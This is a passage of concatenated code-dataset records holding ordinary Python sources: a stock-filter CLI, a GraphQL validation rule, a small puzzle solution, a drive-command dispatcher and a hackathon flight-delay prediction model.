if(float(stock.peRatio) <= float(peRatio)):\n filterList.append(stock)\n else:\n filterList.append(stock)\n else:\n if not (peRatio is None):\n if(float(stock.peRatio) <= float(peRatio)):\n filterList.append(stock)\n else:\n filterList.append(stock)\n except:\n pass\n\n return filterList\n\ndef CustomSearch():\n print(\"Enter custom filter options\")\n print(\"Leave blank to ignore option\")\n dYield = input(\"Dividend Yield >= : \")\n if(dYield == \"\"):\n dYield = None\n dGrowthRate = input(\"Dividend Growth Rate >= : \")\n if(dGrowthRate == \"\"):\n dGrowthRate = None\n peRatio = input(\"PE Ratio <= : \")\n if(peRatio == \"\"):\n peRatio = None\n name = input(\"Name for output file : \")\n if(name == \"\"):\n name = round(time.time())\n name = str(name)+\".csv\"\n writeOuputCsv(filterStocklist(DividendStockListStored, dYield=dYield, dGrowthRate=dGrowthRate, peRatio=peRatio), name)\n\n\ndef fullRefresh():\n if(Path.exists(Path(sheetName))):\n os.remove(sheetName)\n try:\n init()\n except:\n pass\n\n\n\ndef produceLists(filterList):\n for f in filterList:\n out = filterStocklist(DividendStockListStored, dYield=f.dYield, dGrowthRate=f.dGrowthRate, peRatio=f.peRatio)\n writeOuputCsv(out, f.outputName)\n\n\ndef saveListData():\n global listData\n csvData = []\n for f in listData:\n csvData.append([f.name, f.dYield, f.dGrowthRate, f.peRatio])\n\n with open(listStore, 'w', newline='') as lsHandle:\n wr = csv.writer(lsHandle, quoting=csv.QUOTE_ALL)\n for row in csvData:\n wr.writerow(row)\n\n\ndef addFilter():\n global listData\n getting = True\n while getting:\n print(\"please enter a name for the new filter\")\n print(\"type cancel to cancel\")\n name = input(\"> \")\n if(name == \"cancel\"):\n return\n if(len(name)>0):\n getting = False\n else:\n print(\"you must enter a name for a new filter\")\n input(\"press enter to re enter name\")\n\n\n getting = True\n while getting:\n print(\"please enter the dividend yield for the new filter\")\n print(\"leave this blank to ignore this filter\")\n dYield = input(\"> \")\n if not (dYield == \"\"):\n try:\n dYield = float(dYield)\n if(dYield >= 1 or dYield <= 0):\n print(\"dividend yield must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend yield\")\n else:\n getting = False\n except:\n print(\"dividend yield must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend yield\")\n else:\n dYield = None\n getting = False\n\n getting = True\n while getting:\n print(\"please enter the dividend growth rate for the new filter\")\n print(\"leave this blank to ignore this filter\")\n dGrowthRate = input(\"> \")\n if not (dGrowthRate == \"\"):\n try:\n dGrowthRate = float(dGrowthRate)\n if(dGrowthRate >= 1 or dGrowthRate <= 0):\n print(\"dividend growth rate must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend growth rate\")\n else:\n getting = False\n except:\n print(\"dividend growth rate must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend growth rate\")\n else:\n dGrowthRate = None\n getting = False\n\n getting = True\n while getting:\n print(\"please enter the PE ratio for the new filter\")\n print(\"leave this blank to ignore this filter\")\n peRatio = input(\"> \")\n if not (peRatio == \"\"):\n try:\n peRatio = float(peRatio)\n if(peRatio <= 0 or peRatio >= 100):\n print(\"PE ratio must be a valid decimal greater than 0 and less than 100\")\n input(\"press enter to re enter PE ratio\")\n else:\n getting = False\n except:\n print(\"PE ratio must be a valid decimal greater than 0 and less than 100\")\n input(\"press enter to re enter PE ratio\")\n else:\n peRatio = None\n getting = False\n\n newFilter = FilterType(name, dYield=dYield, dGrowthRate=dGrowthRate, peRatio=peRatio)\n listData.append(newFilter)\n saveListData()\n\ndef editFilter():\n global listData\n getting = True\n while getting:\n print(\"please enter the name of the filter you want to edit\")\n print(\"leave blank to cancel\")\n name = input(\"> \")\n i = 0\n if(len(name)>0):\n for f in listData:\n if(name == f.name):\n break\n else:\n i += 1\n if(name == listData[i].name):\n gettingg = True\n while gettingg:\n print(\"please enter a new name for \" + name)\n newName = input(\"> \")\n if(len(newName)>0):\n gettingg = False\n else:\n print(\"you must enter a new name for \" + name)\n input(\"press enter to re enter name\")\n\n gettingg = True\n while gettingg:\n print(\"please enter a new dividend yield for \" + newName)\n print(\"leave this blank to ignore this filter\")\n dYield = input(\"> \")\n if not (dYield == \"\"):\n try:\n dYield = float(dYield)\n if(dYield >= 1 or dYield <= 0):\n print(\"dividend yield must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend yield\")\n else:\n gettingg = False\n except:\n print(\"dividend yield must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend yield\")\n else:\n dYield = None\n gettingg = False\n\n gettingg = True\n while gettingg:\n print(\"please enter a dividend growth rate for \" + newName)\n print(\"leave this blank to ignore this filter\")\n dGrowthRate = input(\"> \")\n if not (dGrowthRate == \"\"):\n try:\n dGrowthRate = float(dGrowthRate)\n if(dGrowthRate >= 1 or dGrowthRate <= 0):\n print(\"dividend growth rate must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend growth rate\")\n else:\n gettingg = False\n except:\n print(\"dividend growth rate must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend growth rate\")\n else:\n dGrowthRate = None\n gettingg = False\n\n gettingg = True\n while gettingg:\n print(\"please enter a new PE ratio for \" + newName)\n print(\"leave this blank to ignore this filter\")\n peRatio = input(\"> \")\n if not (peRatio == \"\"):\n try:\n peRatio = float(peRatio)\n if(peRatio <= 0 or peRatio >= 100):\n print(\"PE ratio must be a valid decimal greater than 0 and less than 100\")\n input(\"press enter to re enter PE ratio\")\n else:\n gettingg = False\n except:\n print(\"PE ratio must be a valid decimal greater than 0 and less than 100\")\n input(\"press enter to re enter PE ratio\")\n else:\n peRatio = None\n gettingg = False\n listData[i].name = newName\n listData[i].dYield = dYield\n listData[i].dGrowthRate = dGrowthRate\n listData[i].peRatio = peRatio\n getting = False\n else:\n print(\"you must enter a name of a filter to edit\")\n input(\"press enter to re enter name\")\n else:\n return\n saveListData()\n\n\ndef removeFilter():\n global listData\n getting = True\n while getting:\n print(\"please enter the name of the filter you want to edit\")\n print(\"leave blank to cancel\")\n name = input(\"> \")\n i = 0\n if(len(name)>0):\n for f in listData:\n if(name == f.name):\n break\n else:\n i += 1\n if(name == listData[i].name):\n del listData[i]\n getting = False\n else:\n print(\"you must enter a name of a filter to remove\")\n input(\"press enter to re enter name\")\n else:\n return\n saveListData()\n\n\ndef clearFilters():\n global listData\n listData = []\n saveListData()\n\n\ndef loadFilterList():\n global listData\n listData = []\n if not (Path.exists(Path(listStore))):\n f = open(listStore, 'w')\n f.close()\n with open(listStore, 'r') as ls:\n reader = csv.reader(ls)\n filterList = list(reader)\n for row in filterList:\n listData.append(FilterType(row[0], row[1], row[2], row[3]))\n return listData\n\n\ndef editLists():\n table = [\n [\"Select option below\"],\n [\"s - Show list of custom filters\"],\n [\"a - Add a new filter to the list\"],\n [\"e - Edit a filter in the list\"],\n [\"r - Remove a filter from the list\"],\n [\"clear - Clear entire filter list\"],\n [\"x - Exit\"]\n ]\n getting = True\n while getting:\n loadFilterList()\n clear()\n print(tabulate(table, headers=\"firstrow\", tablefmt=\"rst\"))\n command = input(\"> \")\n try:\n command = str.lower(command)\n if(command == \"x\"):\n clear()\n return\n elif(command == \"s\"):\n filterList = [\n [\"Name\", \"Yield\", \"Growth Rate\", \"PE Ratio\"]\n ]\n for f in listData:\n filterList.append([f.name, f.dYield, f.dGrowthRate, f.peRatio])\n\n print(tabulate(filterList, headers=\"firstrow\", tablefmt=\"rst\"))\n input(\"press enter to reload menu\")\n clear()\n continue\n elif(command == \"a\"):\n addFilter()\n elif(command == \"e\"):\n editFilter()\n elif(command == \"r\"):\n removeFilter()\n elif(command == \"clear\"):\n clearFilters()\n else:\n print(\"please enter a valid command.\")\n input(\"press enter to reload menu\")\n clear()\n continue\n except:\n print(\"please enter a valid command.\")\n input(\"press enter to reload menu\")\n clear()\n continue\n\n\ndef Menu():\n table = [\n [\"Select option below\"],\n [\"1 - Refresh data\"],\n [\"2 - Produce Lists\"],\n [\"3 - Produce Default Lists\"],\n [\"4 - Edit Lists\"],\n [\"5 - Custom Search\"],\n [\"x - Exit\"]]\n getting = True\n while getting:\n clear()\n print(tabulate(table, headers=\"firstrow\", tablefmt=\"rst\"))\n command = input(\"> \")\n try:\n if(str.lower(command) == \"x\"):\n return\n command = int(command)\n if(command > 0 and command < 6):\n if(command == 1):\n fullRefresh()\n if(command == 2):\n loadFilterList()\n produceLists(listData)\n if(command == 3):\n produceLists(defaultListData)\n if(command == 4):\n editLists()\n if(command == 5):\n try:\n CustomSearch()\n except Exception as ex:\n print(ex)\n clear()\n continue\n else:\n print(\"please enter a valid command.\")\n input(\"press enter to reload menu\")\n clear()\n continue\n except:\n print(\"please enter a valid command.\")\n input(\"press enter to reload menu\")\n clear()\n continue\n\n\ndef main():\n init()\n Menu()\n\n\nmain()\n","repo_name":"justjcurtis/BoneMeal","sub_path":"BoneMeal.py","file_name":"BoneMeal.py","file_ext":"py","file_size_in_byte":23021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8397333631","text":"from ...error import GraphQLError\nfrom .base import ValidationRule\n\n\nclass NoUnusedVariables(ValidationRule):\n __slots__ = 'variable_definitions'\n\n def __init__(self, context):\n self.variable_definitions = []\n super(NoUnusedVariables, self).__init__(context)\n\n def enter_OperationDefinition(self, node, key, parent, path, ancestors):\n self.variable_definitions = []\n\n def leave_OperationDefinition(self, operation, key, parent, path, ancestors):\n variable_name_used = set()\n usages = self.context.get_recursive_variable_usages(operation)\n op_name = operation.name and operation.name.value or None\n\n for variable_usage in usages:\n variable_name_used.add(variable_usage.node.name.value)\n\n for variable_definition in self.variable_definitions:\n if variable_definition.variable.name.value not in variable_name_used:\n self.context.report_error(GraphQLError(\n self.unused_variable_message(variable_definition.variable.name.value, op_name),\n [variable_definition]\n ))\n\n def enter_VariableDefinition(self, node, key, parent, path, ancestors):\n self.variable_definitions.append(node)\n\n @staticmethod\n def unused_variable_message(variable_name, op_name):\n if op_name:\n return 'Variable \"${}\" is never used in operation \"{}\".'.format(variable_name, op_name)\n return 'Variable \"${}\" is never used.'.format(variable_name)\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/graphql-core-1.1/wandb_graphql/validation/rules/no_unused_variables.py","file_name":"no_unused_variables.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"15223380790","text":"import sys\nread = sys.stdin.readline\n\nN = int(read())\nwords = dict()\nfor _ in range(N):\n words[read().rstrip()] = 1\nfor word in words:\n if word[::-1] in words:\n print(len(word), word[len(word)//2])\n break","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj9933.py","file_name":"boj9933.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16010014703","text":"from os import getcwd\n\nfrom . import wire_client\nfrom . import lib_drive_cmd\nfrom . import lib_drive_cmd_index\nfrom . import lib_utils\nfrom . import lib_wire\n\nfrom .models import Task\n\n\ndef main(args):\n if len(args.cmd) == 0:\n exit(lib_utils.run(['drive']).returncode)\n\n d_cmd = args.cmd[0]\n\n if d_cmd == 'index': # Should it be a special case?\n return lib_drive_cmd_index.main(args.cmd[1:])\n\n task = Task(tid=Task.gen_tid(), cwd=getcwd(), cmd='d', args=args.cmd, block=False)\n\n task_list = lib_drive_cmd.get_hook_pre(task.args[0])(task)\n\n if not task_list:\n task_list = [task]\n\n for task in task_list:\n if task.block == Task.LOCAL:\n ret = lib_drive_cmd.run(task)\n\n if task.block == Task.QUEUE:\n ret = wire_client.submit_task(task)\n\n if task.block == Task.BLOCK:\n ret = wire_client.submit_task(task)\n if ret == 0:\n ret = lib_drive_cmd.run(task)\n\n if ret != 0:\n return ret\n","repo_name":"pi314/tq","sub_path":"cli_d.py","file_name":"cli_d.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18036631111","text":"\"\"\"\n===================================================\n Introduction to Machine Learning (67577)\n IML HACKATHON, June 2020\n\nAuthor(s):\nYahav Bar\nShaked Haiman\nTzvi Cohen\n===================================================\n\"\"\"\n\nimport os\nimport re\nfrom typing import Optional, Any\n\nimport joblib\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom pandas import DataFrame\nfrom pandas.tseries.holiday import USFederalHolidayCalendar\nfrom plotnine import ggplot, aes, geom_point, labs, geom_tile\nfrom sklearn import metrics, linear_model\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier\n\n\ndef get_initial_path() -> str:\n \"\"\"\n Gets the inital path.\n :return: The initial path\n \"\"\"\n # submissions should be relative to ./src (https://moodle2.cs.huji.ac.il/nu19/mod/forum/discuss.php?d=92765)\n return './'\n # return os.path.abspath('')\n\n\n\"\"\"The path to the flights training data set.\"\"\"\nFLIGHTS_TRAIN_DATA_PATH = os.path.join(get_initial_path(), 'flight_data', 'train_data.csv')\n\n\"\"\"The path to the weather training data set.\"\"\"\nWEATHER_TRAIN_DATA_PATH = os.path.join(get_initial_path(), 'all_weather_data', 'all_weather_data.csv')\n\n\"\"\"The path to the flights test data set.\"\"\"\nFLIGHTS_TEST_DATA_PATH = os.path.join(get_initial_path(), 'flights_demo_test_file.csv')\n\n\"\"\"The path to the regression model.\"\"\"\nREGRESSION_MODEL_OUTPUT_PATH = os.path.join(get_initial_path(), 'regression.pkl')\n\n\"\"\"The path to the classifier model.\"\"\"\nCLASSIFIER_MODEL_OUTPUT_PATH = os.path.join(get_initial_path(), 'classifier.pkl')\n\n\"\"\"The list of features the model has to have.\"\"\"\nFEATURES_MODEL_OUTPUT_PATH = os.path.join(get_initial_path(), 'features.pkl')\n\n\"\"\"The list of labels the delay is classified by.\"\"\"\nCLASSIFICATION_LABELS_OUTPUT_PATH = os.path.join(get_initial_path(), 'labels.pkl')\n\n\"\"\"The weather outliners.\"\"\"\nWEATHER_OUTLINERS = ['snow_in', 'precip_in', 'avg_wind_speed_kts']\n\n\"\"\"A dummy => prefix map.\"\"\"\nFLIGHT_DUMMIES_MAP = {\n 'DayOfWeek': 'weekday',\n 'Reporting_Airline': 'airline',\n 'Origin': 'origin',\n 'Dest': 'dest'\n}\n\n\"\"\"A list of dropped flight features.\"\"\"\nDROPPED_FLIGHTS_FEATURES = ['Tail_Number', 'OriginCityName', 'OriginState', 'DestCityName',\n 'DestState', 'Flight_Number_Reporting_Airline', 'CRSElapsedTime', 'FlightDate']\n\n\n# region Model Trainer\n\nclass FlightModelPreProcessor:\n \"\"\"A holidays calendar, used to create a 'is holiday' feature.*\"\"\"\n _calendar = USFederalHolidayCalendar()\n\n \"\"\"Factorized labels\"\"\"\n _factorized_data: Optional[DataFrame] = None\n\n @staticmethod\n def get_factorized_data():\n \"\"\"\n Gets the factorized data.\n :return: The factorized data.\n \"\"\"\n return FlightModelPreProcessor._factorized_data\n\n @staticmethod\n def apply_cleanup_pipeline(df: DataFrame, weather_file_path: Optional[str] = '',\n drop_features: bool = False) -> DataFrame:\n \"\"\"\n Apply the cleanup pipeline on the given data frame.\n :param df: The data frame.\n :param weather_file_path: The weather file.\n :param drop_features: True if we should optimize this model to drop unnecessary features, false otherwise.\n :return: The data frame, after being processed in the standard pipeline.\n \"\"\"\n preprocess_pipeline = [\n FlightModelPreProcessor.fix_flight_date,\n lambda d: FlightModelPreProcessor.join_weather_db(d, weather_file_path)\n if weather_file_path else d,\n FlightModelPreProcessor.format_flight_time,\n FlightModelPreProcessor.add_holiday_information,\n FlightModelPreProcessor.add_dummies,\n FlightModelPreProcessor.add_flight_times_bins,\n FlightModelPreProcessor.add_is_same_state,\n lambda d: FlightModelPreProcessor.drop_features(d) if not drop_features else d,\n ]\n\n for pipeline_entry in preprocess_pipeline:\n df = pipeline_entry(df)\n\n df.fillna(0, inplace=True)\n return df\n\n @staticmethod\n def add_flight_times_bins(df: DataFrame) -> DataFrame:\n \"\"\"\n Group the flight times into 2-hours bins.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n two_hours_bins = np.linspace(0, 2400, num=25)\n two_hours_labels = np.rint(np.linspace(0, 23, 24))\n\n df[\"DepartureBins\"] = pd.cut(df['CRSDepTime'], bins=two_hours_bins, labels=two_hours_labels)\n df[\"ArrivalBins\"] = pd.cut(df['CRSArrTime'], bins=two_hours_bins, labels=two_hours_labels)\n\n df.drop(['CRSDepTime', 'CRSArrTime'], axis=1)\n return df\n\n @staticmethod\n def drop_neglectable_entries(df: DataFrame) -> DataFrame:\n \"\"\"\n Drops neglect-able data that might add some unnecessary noise to our data frame.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n df = df[abs(df[\"ArrDelay\"] - np.mean(df[\"ArrDelay\"])) < 3.5 * np.std(df[\"ArrDelay\"])]\n df = df[~df[\"ArrDelay\"].isna()]\n return df\n\n @staticmethod\n def factorize(df: DataFrame, field: str) -> DataFrame:\n \"\"\"\n Factorize the given field.\n :param df: The data frame.\n :param field: The field to factorize.\n :return: The modified data frame.\n \"\"\"\n FlightModelPreProcessor._factorized_data = df[field].factorize()\n df[field] = FlightModelPreProcessor._factorized_data[0]\n return df\n\n @staticmethod\n def add_dummies(df: DataFrame) -> DataFrame:\n \"\"\"\n Adds dummies to categorize the data.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n return pd.get_dummies(df, columns=FLIGHT_DUMMIES_MAP.keys(), prefix=FLIGHT_DUMMIES_MAP.values())\n\n @staticmethod\n def drop_features(df: DataFrame) -> DataFrame:\n \"\"\"\n Drop unnecessary features from the flights df.\n Adds dummies to categorize the data.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n return df.drop(DROPPED_FLIGHTS_FEATURES, axis=1)\n\n @staticmethod\n def format_flight_time(df: DataFrame) -> DataFrame:\n \"\"\"\n Formats the flight date as a Pandas datetime.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n df['FlightDate'] = pd.to_datetime(df['FlightDate'], format=\"%d-%m-%y\")\n return df\n\n @staticmethod\n def add_holiday_information(df: DataFrame) -> DataFrame:\n \"\"\"\n Adds a \"is holiday\" feature.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n holidays = FlightModelPreProcessor._calendar.holidays(start=df['FlightDate'].min(), end=df['FlightDate'].max())\n df[\"IsHoliday\"] = df[\"FlightDate\"].isin(holidays)\n return df\n\n @staticmethod\n def add_is_same_state(df: DataFrame) -> DataFrame:\n \"\"\"\n Adds a \"is same state\" feature.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n df[\"IsSameState\"] = df[\"OriginState\"] == df[\"DestState\"]\n return df\n\n @staticmethod\n def join_weather_db(df: DataFrame, path_to_weather: str) -> DataFrame:\n \"\"\"\n Joins the weather data frame with the flights db.\n :param df: The flights df.\n :param path_to_weather: The path to the weather df.\n :return: The joined df.\n \"\"\"\n # Load\n weather_data_frame = FlightModelPreProcessor.load_weather_db(path_to_weather)\n\n # Join it with our data based on the given join columns (SQL like, lol)\n weather_origin_data = weather_data_frame.dropna().drop(columns=['station', 'FlightDate'])\n weather_dest_data = weather_origin_data.copy()\n weather_origin_data = weather_origin_data.add_suffix('_Origin')\n weather_dest_data = weather_dest_data.add_suffix('_Dest')\n weather_origin_data = pd.concat([weather_data_frame[['station', 'FlightDate']], weather_origin_data],\n axis=1).rename(columns={'station': 'Origin'})\n weather_dest_data = pd.concat([weather_data_frame[['station', 'FlightDate']], weather_dest_data],\n axis=1).rename(columns={'station': 'Dest'})\n\n return df \\\n .merge(weather_origin_data, on=['Origin', 'FlightDate'], how='left') \\\n .merge(weather_dest_data, on=['Dest', 'FlightDate'], how='left')\n\n @staticmethod\n def load_weather_db(path_to_weather: str):\n \"\"\"\n Loads the weather df.\n :param path_to_weather: The path to the weather df.\n :return: The loaded weather df.\n \"\"\"\n weather_df = pd.read_csv(path_to_weather,\n usecols=['station', 'day', 'max_temp_f', 'precip_in', 'avg_wind_speed_kts'],\n low_memory=False)\n\n # Fix the file contents\n weather_df = weather_df.rename(columns={'day': 'FlightDate'})\n weather_df.replace(to_replace=[\"None\", \"-100\", \"-99\"], value=np.nan, inplace=True)\n weather_df.iloc[:, 2:] = weather_df.iloc[:, 2:].apply(pd.to_numeric)\n weather_df[weather_df['max_temp_f'].astype(float) > 130] = np.nan\n\n return weather_df\n\n @staticmethod\n def remove_weather_outliers(df: DataFrame) -> DataFrame:\n \"\"\"\n Iterates and remove the weather outliners.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n for col in WEATHER_OUTLINERS:\n # Corrupted rows\n mean = df[((df[col] != 'None') & (df[col] != '-99') & ~df[col].isna())]\n [col].astype('float').mean()\n\n # Fix none values\n df[col] = df[col].astype('string')\n df[col].loc[df[col] == 'None'] = str(mean)\n df[col].loc[df[col].isna()] = str(mean)\n\n # Float conversation and removal of neglectable values\n df[col] = df[col].astype('float')\n df[col].loc[df[col].astype('float') < 0] = mean\n df[col].loc[abs(df[col].astype('float') - mean) < 3.5 * np.std(df[col].astype('float'))] = mean\n df[col][df['FlightDate'].str.contains('-0[3-9]-', na=False)] = 0\n\n return df\n\n @staticmethod\n def fix_flight_date(df: DataFrame) -> DataFrame:\n \"\"\"\n Fixes the flight date entry.\n :param df: The data frame.\n :return: The modified data frame.\n \"\"\"\n\n df['FlightDate'] = df['FlightDate'].apply(lambda d: re.sub(r'(\\d\\d)(\\d\\d)(-\\d+-)(\\d+)', r'\\4\\3\\2', d))\n return df\n\n\nclass FlightModelTrainer:\n \"\"\"\n A class that trains set of models that can detect flight delays.\n \"\"\"\n\n \"\"\"The used seed.\"\"\"\n _random_seed: int\n\n def __init__(self, random_seed: int = 0):\n \"\"\"\n Initialize the model trainer.\n :param random_seed: The trainer random seed.\n \"\"\"\n # Setup the random seed\n self._random_seed = random_seed\n np.random.seed(random_seed)\n\n def train(self, compression_level=9):\n \"\"\"\n Train the model.\n :param compression_level: The saved model compression level.\n \"\"\"\n # Load the data\n flights_df = pd.read_csv(FLIGHTS_TRAIN_DATA_PATH, low_memory=False)\n\n # Merge\n X = flights_df.drop([\"ArrDelay\", \"DelayFactor\"], axis=1)\n y = flights_df[[\"ArrDelay\", \"DelayFactor\"]]\n\n # Process the data\n print('prepare')\n processed_data = self._prepare_train_data(X, y)\n\n # Setup the training process\n y_train_regression = processed_data.loc[:, 'ArrDelay'].to_frame()\n y_train_classification = processed_data.loc[:, 'DelayFactor'].to_frame()\n x_train = processed_data.drop(['ArrDelay', 'DelayFactor'], axis=1)\n collected_features = x_train.columns.values.tolist()\n\n # Apply regression\n print('regression')\n lasso_regression = LassoCV(cv=5, random_state=self._random_seed).fit(x_train, y_train_regression.values.ravel())\n\n # Apply classification\n print('classification')\n classification_model = OneVsRestClassifier(DecisionTreeClassifier(max_depth=11))\n classification_model.fit(x_train, y_train_classification)\n\n # Save the results\n joblib.dump(lasso_regression, REGRESSION_MODEL_OUTPUT_PATH, compress=compression_level)\n joblib.dump(classification_model, CLASSIFIER_MODEL_OUTPUT_PATH, compress=compression_level)\n joblib.dump(collected_features, FEATURES_MODEL_OUTPUT_PATH, compress=compression_level)\n joblib.dump(FlightModelPreProcessor.get_factorized_data(), CLASSIFICATION_LABELS_OUTPUT_PATH,\n compress=compression_level)\n\n print('Done.')\n\n def _do_train(self, x_train, x_validate, y_train, y_validate):\n \"\"\"\n Trains the model using polynomial features.\n Unfortunately we couldn't finish to use this approach completely due to time reasons.\n We leave here the code to show our best efforts! :) :muscle: :muscle:\n\n :param x_train: The training data.\n :param x_validate: The validation data.\n :param y_train: The y train vector.\n :param y_validate: The y validation vector.\n \"\"\"\n score_min = 10000\n for order in range(1, 3):\n for alpha in range(0, 20, 2):\n feature = PolynomialFeatures(degree=order)\n x_train = feature.fit_transform(x_train)\n validate_X = feature.fit_transform(x_validate)\n\n # ridge:\n ridge_model = linear_model.Ridge(alpha=alpha / 10, normalize=True)\n ridge_model.fit(x_train, y_train)\n result1 = ridge_model.predict(validate_X)\n\n # regression tree:\n reg = DecisionTreeRegressor(max_depth=alpha + 1)\n reg.fit(x_train, y_train)\n result2 = reg.predict(validate_X)\n\n score1 = metrics.mean_squared_error(result1, y_validate)\n score2 = metrics.mean_squared_error(result2, y_validate)\n\n if score1 < score_min:\n score_min = score1\n\n print(\"n={} (a={}), MSE = {:<0.5}\".format(order, alpha / 10, score1))\n print(\"tree: n={} (a={}), MSE = {:<0.5}\".format(order, alpha + 1, score2))\n\n def _prepare_train_data(self, x: DataFrame, y: DataFrame,\n drop_features: bool = False) -> DataFrame:\n \"\"\"\n Prepare the data for training.\n :param x: The main data.\n :param y: The y vector.\n :param drop_features: True if we should optimize this model to drop unnecessary features, false otherwise.\n :return: The processed data.\n \"\"\"\n df = x.join(y)\n df = FlightModelPreProcessor.drop_neglectable_entries(df)\n df = FlightModelPreProcessor.factorize(df, 'DelayFactor')\n return FlightModelPreProcessor.apply_cleanup_pipeline(df, WEATHER_TRAIN_DATA_PATH, drop_features)\n\n def visualize(self):\n \"\"\"\n Visualize the data models.\n \"\"\"\n # Load the data\n flights_df = pd.read_csv(FLIGHTS_TRAIN_DATA_PATH, low_memory=False)\n flights_df = flights_df.head(10000)\n\n # Merge\n X = flights_df.drop([\"ArrDelay\", \"DelayFactor\"], axis=1)\n y = flights_df[[\"ArrDelay\", \"DelayFactor\"]]\n\n # Process the data\n print('prepare')\n df = self._prepare_train_data(X, y, True)\n\n # Declare an \"is delayed\" feature to use in the plots\n df[\"is_delayed\"] = (df['DelayFactor'] != -1).astype(int)\n\n # Render a pair-plot with lot of comparative information\n print(sns.pairplot(df, vars=[\"CRSElapsedTime\", \"Distance\", \"Flight_Number_Reporting_Airline\"], hue='is_delayed'))\n\n # Render specific features\n print((ggplot(df) +\n aes(x='Distance', y='ArrDelay', color='is_delayed') +\n geom_point() +\n labs(title=f\"Distance V. Delay: ${round(df['ArrDelay'].corr(df['Distance']), 5)}$\")))\n\n print(ggplot(df) +\n aes(x='CRSElapsedTime', y='ArrDelay', color='is_delayed') +\n geom_point() +\n labs(title=f\"CRSElapsedTime V. Delay: ${round(df['ArrDelay'].corr(df['CRSElapsedTime']), 3)}$\"))\n\n print(ggplot(df) +\n aes(x='DepartureBins', y='ArrDelay', color='is_delayed') +\n geom_point() +\n labs(title=f\"DepartureBins V. Delay: ${round(df['ArrDelay'].corr(df['DepartureBins']), 3)}$\"))\n\n print((ggplot(df) +\n aes(x='ArrivalBins', y='ArrDelay', color='is_delayed') +\n geom_point() +\n labs(title=f\"ArrivalBin V. Delay: {round(df['ArrDelay'].corr(df['ArrivalBins']), 3)}\")))\n\n # Create a tiles based indicators\n numeric_columns = pd.concat([df['ArrivalBins'], df['DepartureBins'], df['CRSElapsedTime'],\n df['Distance'], df['ArrDelay']], axis=1)\n correlation_matrix = numeric_columns.corr(method='pearson').round(2)\n correlation_matrix.index.name = 'variable2'\n correlation_matrix.reset_index(inplace=True)\n print(ggplot(pd.melt(correlation_matrix, id_vars=['variable2'])) +\n aes(x='variable', y='variable2', fill='value') +\n geom_tile() +\n labs(title='Numeric Columns Correlation'))\n\n\n# endregion\n\n\n# region Predictor\n\nclass FlightPredictor:\n \"\"\"\n A class that uses a pre-made models to predicate flights delays.\n \"\"\"\n\n \"\"\"The path to the weather file.\"\"\"\n weather_file_path: Optional[str]\n\n \"\"\"A cached object that contains the used features, so that we can re-index the test data.\"\"\"\n _features: Any\n\n \"\"\"The classifier object.\"\"\"\n _classifier: OneVsRestClassifier\n\n \"\"\"The labels object.\"\"\"\n _labels: Any\n\n def __init__(self, path_to_weather: str = ''):\n \"\"\"\n Initialize an object from this class.\n @param path_to_weather: The path to a csv file containing weather data.\n \"\"\"\n # Thaw the freeze'd models\n self._model = joblib.load(REGRESSION_MODEL_OUTPUT_PATH)\n self._classifier = joblib.load(CLASSIFIER_MODEL_OUTPUT_PATH)\n self._features = joblib.load(FEATURES_MODEL_OUTPUT_PATH)\n self._labels = joblib.load(CLASSIFICATION_LABELS_OUTPUT_PATH)\n\n self.weather_file_path = path_to_weather if path_to_weather != '' else None\n\n def predict(self, x):\n \"\"\"\n Receives a pandas DataFrame of shape (m, 15) with m flight features, and predicts their\n delay at arrival and the main factor for the delay.\n @param x: A pandas DataFrame with shape (m, 15)\n @return: A pandas DataFrame with shape (m, 2) with your prediction\n \"\"\"\n\n # Prepare the data for evaluation\n df = self._prepare_test_data(x)\n\n # Regression\n regression = self._model.predict(df)\n\n # Classification\n classification = self._classifier.predict(df)\n FlightModelPreProcessor.get_factorized_data()\n\n pred_df = pd.DataFrame({\n 'PredArrDelay': regression,\n 'PredDelayFactor': classification\n })\n\n pred_df['PredDelayFactor'] = pred_df['PredDelayFactor'].apply(self.classify_by_label)\n pred_df.loc[pred_df['PredArrDelay'] <= 0, \"PredDelayFactor\"] = 'Nan'\n\n return pred_df\n\n def classify_by_label(self, row: int) -> str:\n \"\"\"\n Gets the label associated with this row.\n :param row: The row.\n :return: The label.\n \"\"\"\n try:\n if row != -1:\n return self._labels[1][row]\n\n return 'Nan'\n except KeyError:\n return 'Nan'\n\n def _prepare_test_data(self, X) -> DataFrame:\n \"\"\"\n Prepare the test data for evaluation.\n :param X: The data frame values.\n :return:\n \"\"\"\n joined_df = FlightModelPreProcessor.apply_cleanup_pipeline(X, self.weather_file_path)\n joined_df = joined_df.reindex(self._features, axis=1, fill_value=0)\n joined_df.fillna(0, inplace=True)\n return joined_df\n\n# 